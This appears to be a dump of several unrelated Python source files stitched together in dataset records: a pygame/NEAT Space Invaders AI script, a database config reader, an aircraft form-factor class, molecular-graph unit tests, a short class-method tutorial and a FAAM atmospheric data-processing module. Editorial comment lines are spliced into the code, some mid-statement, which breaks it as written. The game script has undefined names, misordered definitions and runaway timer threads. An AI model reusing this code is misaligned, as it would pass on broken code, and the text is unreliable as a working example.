screen.blit(playerimg,(x,y))\n \n#Enemy\nenemyimg = []\nenemyimgT = [] \nenemyX = []\nenemyY = []\nenemyX_change = []\nenemyY_change = []\n\nfor i in range(0,6):\n enemyimg.append(pygame.image.load(\"alien.png\"))\n enemyimgT.append(pygame.transform.scale(enemyimg[i], (45, 45)))\n enemyX.append(random.randint(0,755))\n enemyY.append(random.randint(50,200))\n enemyX_change.append(4)\n enemyY_change.append(45)\n\ndef enemy(x,y,i):\n screen.blit(enemyimgT[i],(x,y))\n \n\n#Bullet\nbulletimg = pygame.image.load(\"bullet.png\")\nbulletimg = pygame.transform.scale(bulletimg, (35, 35))\n\nbulletX = 0\nbulletY = 480\nbulletX_change = 0\nbulletY_change = 10\nbullet_state = \"ready\"\n\ndef fire_bullet(x,y):\n global bullet_state\n bullet_state = 'fire'\n screen.blit(bulletimg,(x+5,y+16))\n \n \ndef Collusion(aX,aY,bX,bY):\n distance = 
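# Aside (editorial, not part of the original game code): math.hypot computes
# the same Euclidean distance as the expression being built here, e.g.
#     distance = math.hypot(aX - bX, aY - bY)
# which reads better and is numerically safer than
# math.sqrt(math.pow(aX - bX, 2) + math.pow(aY - bY, 2)).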
math.sqrt(math.pow((aX-bX),2)+math.pow((aY-bY),2))\n if distance <= 25:\n return True\n else:\n return False\n \ndef run(config_file):\n \n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n p = neat.Population(config)\n \n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n \n # Run for up to 300 generations.\n winner = p.run(eval_genomes, 100)\n\nif __name__ == '__main__':\n\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward.txt')\n run(config_path)\n\n\ndef printit():\n threading.Timer(1.0, printit).start()\n genomes.fitness += 0.5\n\n\ndef eval_genomes(genomes, config):\n \n net = neat.nn.FeedForwardNetwork.create(genomes, config)\n genmoes.fitness = 0\n \n\n\n while True:\n \n #increase fitness 0.5 every sec\n printit()\n \n screen.fill((0,0,0))\n screen.blit(background,(0,0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.display.quit()\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n playerX_change = -5\n \n if event.key == pygame.K_RIGHT:\n playerX_change = 5\n \n if event.key == pygame.K_SPACE:\n if bullet_state is \"ready\":\n bulletX = playerX\n fire_bullet(bulletX,bulletY)\n mixer.music.load(\"laser.wav\")\n mixer.music.play()\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n playerX_change = 0\n \n \n #Player Boundry & Movement\n \n if playerX <= 0:\n playerX = 0\n elif playerX >= 750:\n playerX = 750\n \n playerX += playerX_change\n \n #Neural net\n output = net.activate((playerX,math.sqrt(math.pow((enemyX[0]-playerX[0]),2)+math.pow((enemyY[0]-playerY[0]),2))))\n \n if output >0.5:\n if bullet_state is \"ready\":\n bulletX = playerX\n fire_bullet(bulletX,bulletY)\n mixer.music.load(\"laser.wav\")\n mixer.music.play()\n \n #Bullet Movement\n if bullet_state is \"fire\":\n fire_bullet(bulletX,bulletY)\n bulletY -= bulletY_change\n \n if bulletY <= 0:\n bullet_state = \"ready\"\n bulletY = 480\n \n #Enemy Boundary & Movement\n \n for i in range(0,6):\n \n if enemyY[i]>=480:\n for j in range(0,6):\n enemyY[j]= 2000\n display_gameover()\n break \n \n enemyX[i] += enemyX_change[i] \n if enemyX[i] <= 0:\n enemyX_change[i] = 4\n enemyY[i] += enemyY_change[i]\n elif enemyX[i] >= 750:\n enemyX_change[i] = -4\n enemyY[i] += enemyY_change[0]\n \n colide = Collusion(enemyX[i],enemyY[i],bulletX,bulletY)\n \n enemy(enemyX[i],enemyY[i],i)\n \n if colide:\n bullet_state = \"ready\"\n bulletY = 480\n enemyX[i] = random.randint(0,755)\n enemyY[i]= random.randint(50,200)\n score_value +=1\n genome.fitness +=3\n mixer.music.load(\"explosion.wav\")\n mixer.music.play()\n \n \n display_font(textX,textY)\n player(playerX,playerY) \n pygame.display.update()\n","sub_path":"spaceai.py","file_name":"spaceai.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542921686","text":"#!/usr/bin/python\nfrom configparser import ConfigParser\n\n\ndef config(filename='db/database.ini', section='postgresql'):\n # create a parser\n parser = ConfigParser()\n # read config file\n 
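# Aside (editorial, not part of the original config module):
# ConfigParser.read() returns the list of files it actually parsed and
# silently returns an empty list when the .ini is missing, so a defensive
# variant of the call below is:
#     if not parser.read(filename):
#         raise FileNotFoundError(filename)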
parser.read(filename)\n\n # get section, default to postgresql\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n\n return db\n\n\ndef startDate(filename='db/database.ini', section='cve'):\n # create a parser\n parser = ConfigParser()\n # read config file\n parser.read(filename)\n\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n if param[0] == \"mindate\":\n return param[1]\n\n # User didn't specify oldest date to pull data from\n default_min_date = '01-01-2014'\n return default_min_date\n","sub_path":"db/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527944294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nCopyright: Deutsches Zentrum fuer Luft- und Raumfahrt e.V., 2015 (c)\nContact: daniel.boehnke@dlr.de and jonas.jepsen@dlr.de\n'''\n\nfrom VAMPzero.Handler.Parameter import parameter\n\nclass formFactor(parameter):\n '''\n The parasite drag associated with skin friction and pressure drag is determined \n by incrementing the flat plate results by a factor, to account for \n pressure drag and the higher-than-freestream surface velocities:\n\n :Unit: [ ]\n :Wiki: http://adg.stanford.edu/aa241/drag/formfactor.html \n '''\n\n def __init__(self, value=0., unit='', parent='', cpacsPath=''):\n super(formFactor, self).__init__(value=value, unit=unit, doc=self.__doc__, status='init', parent=parent,\n cpacsPath=cpacsPath)\n\n def calc(self):\n '''\n Calculates the form factor for the engine from length and diameter\n\n :Source: Aircraft Design: A Conceptual Approach, D. P. Raymer, AIAA Education Series, 1992, Second Edition, p. 283, Eq. 12.32\n '''\n dfus = self.parent.dfus.getValue()\n lfus = self.parent.lfus.getValue()\n\n f = lfus / dfus\n \n # limit the form factor to values between 0 and 2 for stability of convergence\n formFactor = 1 + 60. / f ** 3 + f / 400.\n if formFactor < 0.0:\n self.log.warning(\"VAMPzero AERO: The fuselages form factor is calculated to be less than 0.0. Resetting the value to 0.0.\")\n formFactor = 0.0\n elif formFactor > 2.0:\n self.log.warning(\"VAMPzero AERO: The fuselages form factor is calculated to be more than 2.0. 
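# Aside (editorial, not part of the original VAMPzero module): a worked
# number for the slenderness form factor above: with f = lfus/dfus = 10,
#     formFactor = 1 + 60/10**3 + 10/400 = 1 + 0.06 + 0.025 = 1.085
# comfortably inside the [0.0, 2.0] clamp applied in calc() here.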
Resetting the value to 2.0.\")\n formFactor = 2.0\n\n return self.setValueCalc(formFactor)\n\n ###################################################################################################\n #EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFE#\n ###################################################################################################","sub_path":"src/VAMPzero/Component/Fuselage/Aerodynamic/formFactor.py","file_name":"formFactor.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597631255","text":"import numpy as np\nimport torch\n\nfrom dgllife.utils.featurizers import *\nfrom dgllife.utils.mol_to_graph import *\nfrom rdkit import Chem\n\ntest_smiles1 = 'CCO'\ntest_smiles2 = 'Fc1ccccc1'\n\nclass TestAtomFeaturizer(BaseAtomFeaturizer):\n def __init__(self):\n super(TestAtomFeaturizer, self).__init__(\n featurizer_funcs={'hv': ConcatFeaturizer([atomic_number])})\n\nclass TestBondFeaturizer(BaseBondFeaturizer):\n def __init__(self):\n super(TestBondFeaturizer, self).__init__(\n featurizer_funcs={'he': ConcatFeaturizer([bond_is_in_ring])})\n\ndef test_smiles_to_bigraph():\n # Test the case with self loops added.\n g1 = smiles_to_bigraph(test_smiles1, add_self_loop=True)\n src, dst = g1.edges()\n assert torch.allclose(src, torch.LongTensor([0, 2, 2, 1, 0, 1, 2]))\n assert torch.allclose(dst, torch.LongTensor([2, 0, 1, 2, 0, 1, 2]))\n\n # Test the case without self loops.\n test_node_featurizer = TestAtomFeaturizer()\n test_edge_featurizer = TestBondFeaturizer()\n g2 = smiles_to_bigraph(test_smiles2, add_self_loop=False,\n node_featurizer=test_node_featurizer,\n edge_featurizer=test_edge_featurizer)\n assert torch.allclose(g2.ndata['hv'], torch.tensor([[9.], [6.], [6.], [6.],\n [6.], [6.], [6.]]))\n assert torch.allclose(g2.edata['he'], torch.tensor([[0.], [0.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.]]))\n\ndef test_mol_to_bigraph():\n mol1 = Chem.MolFromSmiles(test_smiles1)\n g1 = mol_to_bigraph(mol1, add_self_loop=True)\n src, dst = g1.edges()\n assert torch.allclose(src, torch.LongTensor([0, 2, 2, 1, 0, 1, 2]))\n assert torch.allclose(dst, torch.LongTensor([2, 0, 1, 2, 0, 1, 2]))\n\n # Test the case without self loops.\n mol2 = Chem.MolFromSmiles(test_smiles2)\n test_node_featurizer = TestAtomFeaturizer()\n test_edge_featurizer = TestBondFeaturizer()\n g2 = mol_to_bigraph(mol2, add_self_loop=False,\n node_featurizer=test_node_featurizer,\n edge_featurizer=test_edge_featurizer)\n assert torch.allclose(g2.ndata['hv'], torch.tensor([[9.], [6.], [6.], [6.],\n [6.], [6.], [6.]]))\n assert torch.allclose(g2.edata['he'], torch.tensor([[0.], [0.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.], [1.],\n [1.], [1.], [1.], [1.]]))\n\ndef test_smiles_to_complete_graph():\n test_node_featurizer = TestAtomFeaturizer()\n g = smiles_to_complete_graph(test_smiles1, add_self_loop=False,\n node_featurizer=test_node_featurizer)\n src, dst = g.edges()\n assert torch.allclose(src, torch.LongTensor([0, 0, 1, 1, 2, 2]))\n assert torch.allclose(dst, torch.LongTensor([1, 2, 0, 2, 0, 1]))\n assert torch.allclose(g.ndata['hv'], torch.tensor([[6.], [8.], [6.]]))\n\ndef test_mol_to_complete_graph():\n test_node_featurizer = TestAtomFeaturizer()\n mol1 = Chem.MolFromSmiles(test_smiles1)\n g = mol_to_complete_graph(mol1, add_self_loop=False,\n node_featurizer=test_node_featurizer)\n src, dst = g.edges()\n assert torch.allclose(src, 
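# Aside (editorial, not part of the original tests): src and dst here are
# integer LongTensors, so torch.equal(src, expected) would be the exact
# comparison; torch.allclose applies float-style rtol/atol tolerances that
# these index checks do not actually need.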
torch.LongTensor([0, 0, 1, 1, 2, 2]))\n assert torch.allclose(dst, torch.LongTensor([1, 2, 0, 2, 0, 1]))\n assert torch.allclose(g.ndata['hv'], torch.tensor([[6.], [8.], [6.]]))\n\ndef test_k_nearest_neighbors():\n coordinates = np.array([[0.1, 0.1, 0.1],\n [0.2, 0.1, 0.1],\n [0.15, 0.15, 0.1],\n [0.1, 0.15, 0.16],\n [1.2, 0.1, 0.1],\n [1.3, 0.2, 0.1]])\n neighbor_cutoff = 1.\n max_num_neighbors = 2\n srcs, dsts, dists = k_nearest_neighbors(coordinates, neighbor_cutoff, max_num_neighbors)\n assert srcs == [2, 3, 2, 0, 0, 1, 0, 2, 5, 4]\n assert dsts == [0, 0, 1, 1, 2, 2, 3, 3, 4, 5]\n assert dists == [0.07071067811865474,\n 0.07810249675906654,\n 0.07071067811865477,\n 0.1,\n 0.07071067811865474,\n 0.07071067811865477,\n 0.07810249675906654,\n 0.07810249675906654,\n 0.14142135623730956,\n 0.14142135623730956]\n\nif __name__ == '__main__':\n test_smiles_to_bigraph()\n test_mol_to_bigraph()\n test_smiles_to_complete_graph()\n test_mol_to_complete_graph()\n test_k_nearest_neighbors()\n","sub_path":"apps/life_sci/tests/utils/test_mol_to_graph.py","file_name":"test_mol_to_graph.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619326691","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*- \r\n#====#====#====#==== \r\n#Author:\r\n#CreatDate:\r\n#Version: \r\n#====#====#====#====\r\nclass Maker():\r\n age=18\r\n a=18\r\n def test(self):\r\n print(\"test\")\r\n self.age=20\r\n\r\n #定义类方法\r\n @classmethod\r\n def mytest(cls):\r\n cls.a=88\r\n print(\"我是类方法\")\r\n\r\n# m=Maker()\r\n# m.test()\r\n# Maker().test()\r\n# Maker().mytest()\r\n# Maker.mytest()#调用类方法\r\n# # Maker.test()报错\r\n#\r\n# print(m.age)\r\n# m.test()\r\n# print(m.age)\r\n# m1=Maker()\r\n# print(m1.age)\r\nprint(\"----------\")\r\nm2=Maker()\r\nprint(m2.a)\r\nMaker.mytest()\r\nprint(m2.a)\r\n\r\nm3=Maker()\r\nprint(m3.a)\r\n\r\n\r\n","sub_path":"base/10day/10类方法.py","file_name":"10类方法.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316959946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 21 09:54:16 2018\n\n@author: Admin TEMP\n\"\"\"\nimport datetime\nimport numpy as np\nfrom netCDF4 import Dataset\nimport math\nimport bisect\nimport h5py\nimport scipy.io as sio\nimport matplotlib.pyplot as plt \nimport matplotlib.dates as mdates\nimport matplotlib.colors as colors\nfrom matplotlib.mlab import bivariate_normal\nfrom matplotlib.dates import DateFormatter\nimport os\nimport pandas as pd\n\n#__________________________________________________________________________________________________\n#Bin DataY based on DataX value\n\n\n#def BinLinear(DataY,DataX,StartBin,EndBin, NBins):\n# Output=np.zeros((len(DataX),NBins))*np.nan\n# bins = np.linspace(StartBin,EndBin, NBins)\n# \n# digitized = np.digitize(DataX, bins)\n# \n# for i in range(len(DataY)-1):\n# if DataX[i]>=StartBin and DataX[i]=StartBin and DataX[i] Threshold)\n\n#__________________________________________________________________________________________________\n\ndef remove_prefix(text, prefix):\n return text[text.startswith(prefix) and len(prefix):]\n#__________________________________________________________________________________________________\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n#__________________________________________________________________________________________________\n\n\n\ndef 
DateTime2IgorTime(DateTimeArray):\n dt_base = datetime.datetime(1904, 1, 1, 0, 0, 0)\n #IgorTime = (DateTimeArray - dt_base).total_seconds()\n \n IgorTime= [(DateTimeArray[x]-dt_base).total_seconds() for x in range(len(DateTimeArray))] \n return IgorTime\n\n#__________________________________________________________________________________________________\n\ndef Igor2DateTime(IgorTime):\n dt_base = datetime.datetime(1904, 1, 1, 0, 0, 0)\n Dt= [dt_base + datetime.timedelta(seconds=IgorTime[x]) for x in range(len(IgorTime))]\n return Dt\n\n#__________________________________________________________________________________________________\n\ndef loadTAS(FullPath,FAAMCoreName):\n FAAMCore = Dataset(FullPath+FAAMCoreName)\n Time=np.array(FAAMCore['Time'][:])\n TAS_RVSM=np.array(FAAMCore['TAS_RVSM'][:])\n TAS_RVSM_FLAG=np.array(FAAMCore['TAS_RVSM_FLAG'][:])\n dt_base = datetime.datetime(1904, 1, 1, 0, 0, 0)\n FlightDate= datetime.datetime(int(FAAMCoreName[10:14]), int(FAAMCoreName[14:16]), int(FAAMCoreName[16:18]), 0, 0, 0)\n print(FlightDate)\n TotalSeconds = (FlightDate - dt_base).total_seconds()\n DateTime=TotalSeconds+Time\n TAS_RVSM[TAS_RVSM_FLAG!=0]=np.nan\n \n return TAS_RVSM, DateTime\n\n#__________________________________________________________________________________________________\n#\n\n#FullPath='C:/Users/Admin TEMP/Documents/PICASSO/Flights/FAAM_Data/c082-feb-14/core_processed/'\n#FAAMCoreName='core_faam_20180214_v004_r0_c082_1hz.nc'\n\ndef loadFAAMCore(FullPath,FAAMCoreName):\n FAAMCore = Dataset(FullPath+FAAMCoreName)\n Time=np.array(FAAMCore['Time'][:])\n FlightDate= datetime.datetime(int(FAAMCoreName[10:14]), int(FAAMCoreName[14:16]), int(FAAMCoreName[16:18]), 0, 0, 0)\n Time_Core= [FlightDate + datetime.timedelta(seconds=int(Time[x])) for x in range(len(Time))]\n VariableNames=FAAMCore.variables.keys() \n \n #print(VariableNames) \n FAAMCoreDict={}\n for NameStr in VariableNames: \n if not (NameStr.endswith('_FLAG')) and (NameStr!='Time') :\n# print(NameStr)\n CoreVariable=np.array(FAAMCore[NameStr][:])\n if NameStr+'_FLAG' in VariableNames:\n CoreVariableFlag=np.array(FAAMCore[NameStr+'_FLAG'][:])\n CoreVariable[CoreVariableFlag!=0]=np.nan\n FAAMCoreDict[NameStr]=CoreVariable\n\n FAAMCoreDict['Time_Core']= Time_Core \n \n TAT_DI_R_C=np.array(FAAMCore['TAT_DI_R'][:])\n TAT_DI_R_C-=273.15\n TAT_ND_R_C=np.array(FAAMCore['TAT_ND_R'][:])\n TAT_ND_R_C-=273.15\n \n FAAMCoreDict['TAT_ND_R_C']=TAT_ND_R_C\n FAAMCoreDict['TAT_DI_R_C']=TAT_DI_R_C \n \n \n return FAAMCoreDict \n \n #TAT_DI_R=np.array(FAAMCore['TAT_DI_R'][:])\n #TAT_DI_R_FLAG=np.array(FAAMCore['TAT_DI_R_FLAG'][:])\n #TAT_DI_R[TAT_DI_R_FLAG!=0]=np.nan\n #TAT_DI_R\n\n\n\n \n\n\n#__________________________________________________________________________________________________\n\n\ndef LoadCoreCloud(CoreCloudPath,CoreCloudFile,CdpCalPath,CdpCalFile):\n\n CoreCloud = Dataset(CoreCloudPath+CoreCloudFile)\n \n #load bin sizes\n BinSize = np.loadtxt(CdpCalPath+CdpCalFile,skiprows=9,usecols=range(1,31),delimiter=',')\n CDP_BinCentre=BinSize[0][:]\n CDP_BinWidth=BinSize[2][:]\n #CDP_LogCentre=BinSize[4][:]\n #CDP_LogWidth=BinSize[6][:]\n\n #Load CDP\n CDP_FLAG= np.array(CoreCloud['CDP_FLAG'][:])\n for i in range(1, 31):\n if(i<10):\n i_string = 'CDP_0' + str(i)\n else:\n i_string = 'CDP_'+ str(i)\n # print(i_string) \n CDP_bin = np.array(CoreCloud[i_string][:])\n CDP_bin[CDP_FLAG!=0]=np.nan\n if (i==1):\n CDP_Matrix=np.array(CDP_bin)\n else:\n CDP_Matrix=np.column_stack([CDP_Matrix, CDP_bin])\n\n FlightDate= 
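# Aside (editorial, not part of the original module): 1904-01-01, the
# dt_base used throughout these helpers, is Igor Pro's native time epoch;
# the two converters above are exact inverses, e.g.
#     ts = DateTime2IgorTime([datetime.datetime(2018, 2, 14)])
#     Igor2DateTime(ts)   # -> [datetime.datetime(2018, 2, 14, 0, 0)]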
datetime.datetime(int(CoreCloudFile[20:24]), int(CoreCloudFile[24:26]), int(CoreCloudFile[26:28]), 0, 0, 0)\n CDP_TSPM= np.array(CoreCloud['CDP_TSPM'][:])\n CDP_time_mid= [FlightDate + datetime.timedelta(seconds=int(CDP_TSPM[x])) for x in range(len(CDP_TSPM))]\n CDP_cm3=np.sum(CDP_Matrix,axis=1)\n CDP_dNdDp= CDP_Matrix / CDP_BinWidth\n CDP_gcm3=np.sum(CDP_Matrix*(4/3)*math.pi*(CDP_BinCentre/2e4)**3, axis=1)\n\n return CDP_time_mid, CDP_cm3, CDP_dNdDp, CDP_gcm3, CDP_BinCentre\n\n\n\n#__________________________________________________________________________________________________\n\n\ndef ChangeBaseAvg(t1,w1,tdes, max_avg_window):\n wdes=np.zeros(len(tdes))*np.nan\n #max_avg_window=1 # max difference in time that could be averaged\n counts=np.zeros(len(wdes))\n if (len(w1)==len(t1)) and (len(wdes)==len(tdes)): # check wave lengths are correct \n for i in range(len(w1)): \n if(w1[i]==w1[i]):\n match=bisect.bisect_left(tdes, t1[i]) # assume is sorted, which it should be \n if (np.sqrt((t1[i]-tdes[match])**2) < max_avg_window)\t:\t\n if (counts[match]==0):\n wdes[match]=w1[i]\n else:\n wdes[match]+=w1[i]\n counts[match]+=1\n\n wdes/=counts \n return(wdes)\n else:\n print(\"Array lengths incorrect\")\n\n#__________________________________________________________________________________________________\n\n# t1_dt and tdes_dt are DateTime arrays. w1 is numpy array\n\ndef ChangeTimeBaseAvg(t1_dt,w1,tdes_dt, max_avg_window):\n \n t1=DateTime2IgorTime(t1_dt)\n tdes=DateTime2IgorTime(tdes_dt)\n \n wdes=np.zeros(len(tdes))*np.nan\n #max_avg_window=1 # max difference in time that could be averaged\n counts=np.zeros(len(wdes))\n if (len(w1)==len(t1)) and (len(wdes)==len(tdes)): # check wave lengths are correct \n for i in range(len(w1)-1): \n if(w1[i]==w1[i]):\n match=bisect.bisect_left(tdes, t1[i]) # assume is sorted, which it should be \n \n if (match < len(tdes)-1):\n if (np.absolute(t1[i]-tdes[match]) < max_avg_window)\t:\t\n if (counts[match]==0):\n wdes[match]=w1[i]\n else:\n wdes[match]+=w1[i]\n counts[match]+=1\n\n wdes/=counts \n return(wdes)\n else:\n print(\"Array lengths incorrect\")\n\n\n#__________________________________________________________________________________________________\n\n#x= time dimension\n#y= e.g. 
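# Aside (editorial, not part of the original module): bisect.bisect_left in
# the averaging helpers returns the left insertion index, which is not
# always the nearest timestamp (a nearest-match variant would also compare
# tdes[match - 1]), and it can return len(tdes), so tdes[match] needs the
# bounds guard that ChangeTimeBaseAvg has but ChangeBaseAvg and this 2-D
# variant omit.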
size \n# uses x to sort \n\n\ndef ChangeTimeBase2DAvg(t1_dt,w1,tdes_dt, max_avg_window):\n \n t1=DateTime2IgorTime(t1_dt)\n tdes=DateTime2IgorTime(tdes_dt)\n \n wdes=np.zeros((len(tdes),len(w1[0,:])))*np.nan\n #max_avg_window=1 # max difference in time that could be averaged\n counts=np.zeros((len(wdes),len(w1[0,:])))\n if (len(w1)==len(t1)) and (len(wdes)==len(tdes)): # check wave lengths are correct \n for i in range(len(w1)): \n if(w1[i,0]==w1[i,0]):\n match=bisect.bisect_left(tdes, t1[i]) # assume is sorted, which it should be \n if (np.sqrt((t1[i]-tdes[match])**2) < max_avg_window)\t:\t\n if (counts[match,0]==0):\n wdes[match,:]=w1[i,:]\n else:\n wdes[match,:]+=w1[i,:]\n counts[match,:]+=1\n\n wdes/=counts \n return(wdes)\n else:\n print(\"Array lengths incorrect\")\n \n \n#__________________________________________________________________________________________________\n\n#NevPath='C:/Users/Admin TEMP/Documents/PICASSO/Flights/FAAM_Data/c082-feb-14/Nevzorov/'\n#NevName='c081_nevzorov_20180213_1hz_r0.nc'\n\ndef LoadNevzorov(NevPath,NevName):\n NevData = Dataset(NevPath+NevName)\n #print(NevData.variables.keys())\n #return NevData\n Time=np.array(NevData['TIME'][:])\n TWC_g_m3=np.array(NevData['TWC'][:])\n LWC_g_m3=np.array(NevData['LWC'][:])\n FlightDate= datetime.datetime(int(NevName[14:18]), int(NevName[18:20]), int(NevName[20:22]), 0, 0, 0)\n TimeNev= [FlightDate + datetime.timedelta(seconds=int(Time[x])) for x in range(len(Time))]\n TimeNevIgor=DateTime2IgorTime(TimeNev)\n \n \n return TWC_g_m3, LWC_g_m3, TimeNev, TimeNevIgor\n\n#__________________________________________________________________________________________________\n\ndef LoadOAP(FilePath,FileNameOAP): \n \n DataOAP = h5py.File(FilePath+FileNameOAP, 'r')\n NC_all_x=np.array(DataOAP['NC_all_x'])\n NC_all_y=np.array(DataOAP['NC_all_y'])\n NC_all_z=np.array(DataOAP['NC_all_z']) \n NC_S_z=np.array(DataOAP['NC_S_z']) \n NC_LI_z=np.array(DataOAP['NC_LI_z']) \n NC_MI_z=np.array(DataOAP['NC_MI_z']) \n NC_HI_z=np.array(DataOAP['NC_HI_z'])\n NC_All_accept_CH0_z=np.array(DataOAP['NC_All_accept_CH0_z'])\n NC_All_accept_CH1_z=np.array(DataOAP['NC_All_accept_CH1_z'])\n DataOAP.close()\n \n NC_All_accept_total=np.sum(NC_All_accept_CH0_z,axis=1)\n NC_HI_total=np.sum(NC_HI_z,axis=1)\n NC_MI_total=np.sum(NC_MI_z,axis=1)\n NC_LI_total=np.sum(NC_LI_z,axis=1)\n\n #Calculate DateTime\n NC_sMidnight=(NC_all_x[:-1:1]+NC_all_x[1::1])/2\n FlightDate= datetime.datetime(int(FileNameOAP[5:9]), int(FileNameOAP[9:11]), int(FileNameOAP[11:13]), 0, 0, 0)\n NC_DateTime= [FlightDate + datetime.timedelta(seconds=int(NC_sMidnight[x])) for x in range(len(NC_sMidnight))]\n\n return NC_All_accept_total,NC_HI_total,NC_MI_total,NC_LI_total,NC_all_x, NC_all_y, NC_all_z, NC_LI_z, NC_MI_z, NC_HI_z, NC_All_accept_CH0_z, NC_All_accept_CH1_z, NC_DateTime\n\n\n#__________________________________________________________________________________________________\n\ndef round_time(dt=None, dateDelta=datetime.timedelta(minutes=1), to='average'):\n \"\"\"Round a datetime object to a multiple of a timedelta\n dt : datetime.datetime object, default now.\n dateDelta : timedelta object, we round to a multiple of this, default 1 minute.\n Author: Thierry Husson 2012 - Use it as you want but don't blame me.\n Stijn Nevens 2014 - Changed to use only datetime objects as variables\n \"\"\"\n round_to = dateDelta.total_seconds()\n\n if dt == None : dt = datetime.datetime.now()\n seconds = (dt - dt.min).seconds\n # // is a floor division, not a comment on following line:\n if to == 
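# Aside (editorial, not part of the original module): with the defaults of
# this round_time (dateDelta=timedelta(minutes=1), to='average'), seconds
# round half-up: 12:30:29 -> 12:30:00 while 12:30:30 -> 12:31:00.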
'up':\n # // is a floor division, not a comment on following line (like in javascript):\n rounding = (seconds + round_to) // round_to * round_to\n elif to == 'down':\n rounding = seconds // round_to * round_to\n else:\n rounding = (seconds + round_to / 2) // round_to * round_to\n return dt + datetime.timedelta(0,rounding-seconds,-dt.microsecond)\n\n\n#__________________________________________________________________________________________________\n\ndef Average_nPts(Array,nPts):\n \n ArrayAvg=np.nanmean(np.pad(Array.astype(float), (0, nPts - Array.size%nPts), mode='constant', constant_values=np.NaN).reshape(-1, nPts), axis=1)\n return ArrayAvg\n\n#__________________________________________________________________________________________________\n\ndef Average_nPts_datetime(DateTimeArray,nPts):\n \n Array=np.asarray(DateTime2IgorTime(DateTimeArray))\n ArrayAvg=np.nanmean(np.pad(Array.astype(float), (0, nPts - Array.size%nPts), mode='constant', constant_values=np.NaN).reshape(-1, nPts), axis=1)\n DateTimeArrayAvg=Igor2DateTime(ArrayAvg)\n \n return DateTimeArrayAvg\n\n\n#__________________________________________________________________________________________________\n# average every nPts points in x dimension. y dimension size remains the same\n\n\ndef Average_nPts_2D(Array,nPts):\n \n nx=float(Array.shape[0])\n ny=Array.shape[1]\n\n \n ArrayAvg=np.zeros((int(np.ceil(nx/nPts)),ny))*np.nan\n \n for i in range(int(np.ceil(nx/nPts))-1):\n Slice=Array[i*nPts:(i+1)*nPts,:]\n #SliceAvg=np.nanmean(Slice,axis=0)\n ArrayAvg[i,:]=np.nanmean(Slice,axis=0)\n \n return ArrayAvg\n \n\n#__________________________________________________________________________________________________\n#\n\ndef haversine(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees)\n \"\"\"\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2\n c = 2 * math.asin(math.sqrt(a)) \n # Radius of earth in kilometers is 6371\n km = 6371* c\n return km\n\n#__________________________________________________________________________________________________\n\n\ndef BinMid_2_Width(BinMid):\n \n Width=np.zeros(len(BinMid))\n WidthTmp=(BinMid[1:-1:1]-BinMid[0:-2:1])/2+(BinMid[2::1]-BinMid[1:-1:1])/2\n Width[1:-1]=WidthTmp\n Width[0]=WidthTmp[0]\n Width[len(Width)-1]=WidthTmp[len(WidthTmp)-1]\n\n #Width=np.zeros(len(BinMid))\n return Width\n\n#__________________________________________________________________________________________________\n\ndef loadmat(filename):\n '''\n this function should be called instead of direct spio.loadmat\n as it cures the problem of not properly recovering python dictionaries\n from mat files. It calls the function check keys to cure all entries\n which are still mat-objects\n \n from: `StackOverflow `_\n '''\n data = sio.loadmat(filename, struct_as_record=False, squeeze_me=True)\n return _check_keys(data)\n\n#__________________________________________________________________________________________________\n\ndef _check_keys(dict):\n '''\n checks if entries in dictionary are mat-objects. 
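# Aside (editorial, not part of the original module; 'flight.mat' and the
# keys below are hypothetical): the point of loadmat/_check_keys/_todict is
# that nested MATLAB structs come back as plain dicts, so
#     data = loadmat('flight.mat')
#     lwc = data['Nev']['LWC']
# works instead of attribute access on mat_struct objects.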
